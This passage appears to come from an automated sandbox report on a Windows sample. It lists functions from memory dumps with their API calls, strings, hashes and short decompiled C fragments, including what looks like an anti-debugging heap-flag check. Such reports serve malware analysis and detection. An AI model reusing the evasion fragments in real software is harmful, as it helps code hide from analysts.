                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(10024B30), ref: 10016245
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 10016261
                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 10016268
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2579439406-0
                                                                                                                                                                  • Opcode ID: 480ebdca2b22ee730782bbd644a46fe22bac3cf6626a4db92fe4ddcdd4ec90c9
                                                                                                                                                                  • Instruction ID: ee8eee148a0b36da5bac1509a6259723a028944e4d48fabcbe23e45d6083a592
                                                                                                                                                                  • Opcode Fuzzy Hash: 480ebdca2b22ee730782bbd644a46fe22bac3cf6626a4db92fe4ddcdd4ec90c9
                                                                                                                                                                  • Instruction Fuzzy Hash: 7B21D2B8802224DFD702DF65DCC46453BBCFB88315F915619E90D8EBA2EB709985EF05
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00438B07, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78timeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,00000208,?), ref: 00438B5C
                                                                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 00438B6E
                                                                                                                                                                  Strings
                                                                                                                                                                  • %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u, xrefs: 00438BB7
                                                                                                                                                                  • %04hu-%02hu-%02huT%02hu:%02hu:%02huZ, xrefs: 00438B45
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$InformationLocalSpecificSystemZone
                                                                                                                                                                  • String ID: %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u$%04hu-%02hu-%02huT%02hu:%02hu:%02huZ
                                                                                                                                                                  • API String ID: 1772835396-395410266
                                                                                                                                                                  • Opcode ID: ca1f085078c8bc5d16458a2eb3c968707acf354a7bb0194c974e8212e4c22fc9
                                                                                                                                                                  • Instruction ID: ab43bc886ecf86c0864305c02f8c3e2d20b1707547bddd00f58b6d06ebc6c0d1
                                                                                                                                                                  • Opcode Fuzzy Hash: ca1f085078c8bc5d16458a2eb3c968707acf354a7bb0194c974e8212e4c22fc9
                                                                                                                                                                  • Instruction Fuzzy Hash: 02212CA6500118BED7249F998C05FBBB3FCEB4CB02F00455AB955E2080E73C9E84D774
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00433DA8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FormatMessageW.KERNEL32(000011FF,?,?,00000000,00000000,00000000,00000001,80070656,?,?,?,00417568,00000000,?,00000000,80070656), ref: 00433DDA
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00417568,00000000,?,00000000,80070656,?,?,0040E644,?,00401EA4,80070656,?,0000000D), ref: 00433DE7
                                                                                                                                                                  • LocalFree.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00417568,00000000,?,00000000,80070656,?,?,0040E644,?), ref: 00433E2E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                  • String ID: strutil.cpp
                                                                                                                                                                  • API String ID: 1365068426-3612885251
                                                                                                                                                                  • Opcode ID: 2d3f061fff02a033c8bf439855db3169dc9b95852cc97fdf58f3ecdcd0e5acfc
                                                                                                                                                                  • Instruction ID: 2b85e3b520cc7d2352d92ecd6ed289095840e56d667e2d4df0cc6dff098bd8c6
                                                                                                                                                                  • Opcode Fuzzy Hash: 2d3f061fff02a033c8bf439855db3169dc9b95852cc97fdf58f3ecdcd0e5acfc
                                                                                                                                                                  • Instruction Fuzzy Hash: 91016172900224FFDB159FA5CD09AEFBAA8EF08741F00026ABD01E6250E7748F00DBE4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00413970, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to copy working folder., xrefs: 004139CB
                                                                                                                                                                  • Failed to calculate working folder to ensure it exists., xrefs: 0041398D
                                                                                                                                                                  • Failed create working folder., xrefs: 004139A3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastPathTemp
                                                                                                                                                                  • String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
                                                                                                                                                                  • API String ID: 1238063741-2072961686
                                                                                                                                                                  • Opcode ID: dece842e5f6ad299a177502bd1ddac92c63a6d24ff5a9a0866a2ef16b50cdcd3
                                                                                                                                                                  • Instruction ID: 920975fd333c1df61f61d6ebe0802c88bb4f6d606bb86a46988b8e681d9456c3
                                                                                                                                                                  • Opcode Fuzzy Hash: dece842e5f6ad299a177502bd1ddac92c63a6d24ff5a9a0866a2ef16b50cdcd3
                                                                                                                                                                  • Instruction Fuzzy Hash: 1301B572A10624F68B125B55DC02EDFBAB4DF90766B21021BF404B6110D779AF40A68C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041DA76, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0041DA19,00000000,00000003), ref: 0041DA8D
                                                                                                                                                                  • GetLastError.KERNEL32(?,0041DA19,00000000,00000003,00000000,?), ref: 0041DA97
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to set service start type., xrefs: 0041DAC5
                                                                                                                                                                  • msuengine.cpp, xrefs: 0041DABB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ChangeConfigErrorLastService
                                                                                                                                                                  • String ID: Failed to set service start type.$msuengine.cpp
                                                                                                                                                                  • API String ID: 1456623077-1628545019
                                                                                                                                                                  • Opcode ID: 9e0e60fda5ccdaba4477b58cf4fb1791dd43f3ef0f647c00aa6fe5177fd04018
                                                                                                                                                                  • Instruction ID: b638a06f3bd6bc898a062da12c482c45dc8c1fb2173a821c029bd0e72ee5cfdd
                                                                                                                                                                  • Opcode Fuzzy Hash: 9e0e60fda5ccdaba4477b58cf4fb1791dd43f3ef0f647c00aa6fe5177fd04018
                                                                                                                                                                  • Instruction Fuzzy Hash: FBF0EC3264523076A720266A7C09F8B7AD8DF057B1F110326FD28F51D0D615881085EC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 100197E0, Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 50%
                                                                                                                                                                  			E100197E0(void* __ebx, void* __esi, intOrPtr _a4, char _a8, intOrPtr _a36, intOrPtr* _a40, intOrPtr* _a44) {
				char _v8;
				char _v12;
				void* _t45;

				_v8 = 0;
				_v12 = 0;
				__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12, 0, 0, _a44);
				if(GetLastError() == 0x7a) {
					 *_a40 = L1000CEAF(__ebx, _a44, _t45, __esi,  *_a44);
					E1000CF80(_t45,  *_a40, 0,  *_a44);
					__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12,  *_a40,  *_a44, 0);
					_v8 = 1;
				}
				return _v8;
			}






                                                                                                                                                                  0x100197e6
                                                                                                                                                                  0x100197ed
                                                                                                                                                                  0x1001980c
                                                                                                                                                                  0x1001981b
                                                                                                                                                                  0x1001982e
                                                                                                                                                                  0x1001983e
                                                                                                                                                                  0x10019864
                                                                                                                                                                  0x1001986a
                                                                                                                                                                  0x1001986a
                                                                                                                                                                  0x10019877

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 1001980C
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 10019812
                                                                                                                                                                  • _memset.LIBCMT ref: 1001983E
                                                                                                                                                                  • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019864
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DevicePropertyRegistrySetup$ErrorLast_memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 895502402-0
                                                                                                                                                                  • Opcode ID: 2d95c2e300a34be0fbb8f74636acd25f512a94cea09224e1131316ccc75926d7
                                                                                                                                                                  • Instruction ID: 24f19bb5529a22c6d1e928f7077b1b8c164a3afe4c2a2c0ecea0b5371702a92b
                                                                                                                                                                  • Opcode Fuzzy Hash: 2d95c2e300a34be0fbb8f74636acd25f512a94cea09224e1131316ccc75926d7
                                                                                                                                                                  • Instruction Fuzzy Hash: EA11C6B9610208ABDB04CF94C8D5FDA77B9AB48304F118259F9099B280DA31EA85CBA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00431078, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 13memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcessHeap.KERNEL32(r@,?,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F), ref: 00431089
                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F,?,004072ED), ref: 00431090
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                                                  • String ID: r@
                                                                                                                                                                  • API String ID: 1617791916-2414136952
                                                                                                                                                                  • Opcode ID: 27603959ac93e92ab12e130dc1de55ed8a309b1abcac35a5ec106f94884394f8
                                                                                                                                                                  • Instruction ID: 6a65b5887fb60cc33f906c3bce9d62b865568e391402b1ae6fdd150e0b4a65d8
                                                                                                                                                                  • Opcode Fuzzy Hash: 27603959ac93e92ab12e130dc1de55ed8a309b1abcac35a5ec106f94884394f8
                                                                                                                                                                  • Instruction Fuzzy Hash: 6FC012325A020DAB8B006FF8EC0ED9F7BACEB286027008620BA05C2010C738E0108BA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004279FB, Relevance: 3.9, Strings: 3, Instructions: 136COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: GetProcAddress$LoadLibraryExA$aryExA
                                                                                                                                                                  • API String ID: 0-2920269711
                                                                                                                                                                  • Opcode ID: 2f3a92986eaf651c49b717ac3ce8e463752147d74b3af29585d1c9e67a8752a7
                                                                                                                                                                  • Instruction ID: 064fd1153f8023e2d8d6ffac232408c3d35e74f450f08e449ac5c8fe529035d1
                                                                                                                                                                  • Opcode Fuzzy Hash: 2f3a92986eaf651c49b717ac3ce8e463752147d74b3af29585d1c9e67a8752a7
                                                                                                                                                                  • Instruction Fuzzy Hash: 4B71C370D08288DFDB05CFD8C594BDEBBF1AF49308F148149D545AB386C3BA6A49CBA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004360F6, Relevance: 3.1, APIs: 2, Instructions: 57memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00436280: RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,00436125,?), ref: 004362F1
                                                                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00436149
                                                                                                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0043615A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocateCheckCloseInitializeMembershipToken
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2114926846-0
                                                                                                                                                                  • Opcode ID: 141180ea11910da5b0ca1bd6e9f7952084086db8161ce3211e13d302a449127a
                                                                                                                                                                  • Instruction ID: ed331b5a3d06f4ceeac5f9abb4b754c501ee129c5542153bbbecdb30ced4b4fb
                                                                                                                                                                  • Opcode Fuzzy Hash: 141180ea11910da5b0ca1bd6e9f7952084086db8161ce3211e13d302a449127a
                                                                                                                                                                  • Instruction Fuzzy Hash: 69117C7190031ABBEF10DFA4CD84AAFB7B8FF08344F51542EA501A6241D7789A00CB99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00436AF7, Relevance: 3.0, APIs: 2, Instructions: 43fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,0000001C,00000000,00000000), ref: 00436B32
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00436B3E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                                  • Opcode ID: ba86eeb6bca43458a5ea7e4c1156dd490eea30080f2ab826e790f25595fe9793
                                                                                                                                                                  • Instruction ID: 0d7d1a45ab34da2fed627e9b241150d34d31b003bd7fa92fdb9e9aa87d0575f9
                                                                                                                                                                  • Opcode Fuzzy Hash: ba86eeb6bca43458a5ea7e4c1156dd490eea30080f2ab826e790f25595fe9793
                                                                                                                                                                  • Instruction Fuzzy Hash: 3001DB767001146BDB10DF65AC8999BB3ADEBC5319F414066EA19D3140D638AD498A58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 100153D6, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                                  			E100153D6(void* __eax, void* __ebx, void* __edx) {
				_Unknown_base(*)()* _t8;

				 *((intOrPtr*)(__edx + __ebx - 1)) =  *((intOrPtr*)(__edx + __ebx - 1)) + __edx;
				_t8 = SetUnhandledExceptionFilter(E1001158A());
				 *0x10335948 = 0;
				return _t8;
			}




                                                                                                                                                                  0x100153db
                                                                                                                                                                  0x100153eb
                                                                                                                                                                  0x100153f1
                                                                                                                                                                  0x100153f8

                                                                                                                                                                  APIs
                                                                                                                                                                  • __decode_pointer.LIBCMT ref: 100153E4
                                                                                                                                                                    • Part of subcall function 1001158A: TlsGetValue.KERNEL32(?,10011918,00000000,00000000,1000EB29,00000000,?,?,00000001,?,?,1000EB8D,00000001,?,?,10331550), ref: 10011597
                                                                                                                                                                    • Part of subcall function 1001158A: TlsGetValue.KERNEL32(00000005,?,10011918,00000000,00000000,1000EB29,00000000,?,?,00000001,?,?,1000EB8D,00000001), ref: 100115AE
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100153EB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value$ExceptionFilterUnhandled__decode_pointer
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1958600898-0
                                                                                                                                                                  • Opcode ID: 8a9a1afd20679182302b8bb126efabb9badc4dbb18d80dbba4be7448194c4791
                                                                                                                                                                  • Instruction ID: b8b51d76abf1898de47abb934c9bf902fc70bf371f14314f3375d114c8e601f7
                                                                                                                                                                  • Opcode Fuzzy Hash: 8a9a1afd20679182302b8bb126efabb9badc4dbb18d80dbba4be7448194c4791
                                                                                                                                                                  • Instruction Fuzzy Hash: B7C04CD9418391CED755D77448CE35D7A58A792133FA504C9D4858D1D3DE6498C48621
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0042A5E7, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,0042AC7A,?,?,?,?), ref: 0042A5EC
                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?), ref: 0042A5F5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                  • Opcode ID: aa858961573752b925b14895624f5127aadd05bcc00091f592fd08476d3af49d
                                                                                                                                                                  • Instruction ID: 6bef1c6deaa1c14dc0bcf14b2d656a29aef342fd33f11b3713c7c7873ae36eae
                                                                                                                                                                  • Opcode Fuzzy Hash: aa858961573752b925b14895624f5127aadd05bcc00091f592fd08476d3af49d
                                                                                                                                                                  • Instruction Fuzzy Hash: 50B0923104420CABCB002B91EC0DB5E7F28EB44752F0051A8F72D440F0CB7254108BD9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00436186, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetVersionExW.KERNEL32(?,?,00000000,?), ref: 004361D3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Version
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1889659487-0
                                                                                                                                                                  • Opcode ID: 91c48b87bffddc9cac0747b327d75ceaa9fc9cc38a551f8bc2a37494260597f6
                                                                                                                                                                  • Instruction ID: 18bfce4abf446037fdfc67b9a21de1a69f652d5581446517fd655c8fd4873b1f
                                                                                                                                                                  • Opcode Fuzzy Hash: 91c48b87bffddc9cac0747b327d75ceaa9fc9cc38a551f8bc2a37494260597f6
                                                                                                                                                                  • Instruction Fuzzy Hash: 6121A531A04219AEDF24DB24DC467EBB7B4AB09304F1294EBD546E2242D6789A84CF49
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10019E70, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E10019E70() {
				long _v8;
				signed int _v12;
				intOrPtr _v16;

				_v16 = 0;
				_v8 = GetVersion();
				_v12 = _v8 & 0xff;
				if(_v12 != 5) {
					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x18)) + 0x40));
				} else {
					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x18)) + 0xc));
				}
				return 0 | _v16 != 0x00000002;
			}






                                                                                                                                                                  0x10019e76
                                                                                                                                                                  0x10019e83
                                                                                                                                                                  0x10019e9a
                                                                                                                                                                  0x10019ea1
                                                                                                                                                                  0x10019ec0
                                                                                                                                                                  0x10019ea3
                                                                                                                                                                  0x10019eaf
                                                                                                                                                                  0x10019eaf
                                                                                                                                                                  0x10019ecf

                                                                                                                                                                  APIs
